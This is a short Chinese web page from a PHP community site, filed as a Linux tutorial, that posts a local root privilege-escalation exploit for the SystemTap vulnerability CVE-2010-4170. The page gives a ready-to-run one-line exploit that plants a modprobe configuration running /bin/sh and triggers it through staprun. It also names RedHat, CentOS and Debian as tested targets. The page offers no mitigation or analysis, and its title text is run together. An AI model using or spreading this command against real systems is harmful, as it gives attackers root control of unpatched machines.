当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

Linux2.6.18-194.8.1.el5PAEi686exploitrooting

linuxsystemtapLocalRootPrivilegeEscalationVulnerability导致本地提权漏洞vulnerability,linux,漏洞CVE-2010-4170演示视频:http:video.linux520.comvl00135利用代码:printfinstalluprobesbinshexploit.conf;MODPROBE_OPTIONS

linux systemtap Local Root Privilege Escalation Vulnerability 导致本地提权漏洞
vulnerability, linux, 漏洞
CVE-2010-4170

利用代码:
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever

已测试受影响的版本:
RedHat
Centos
debian

吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有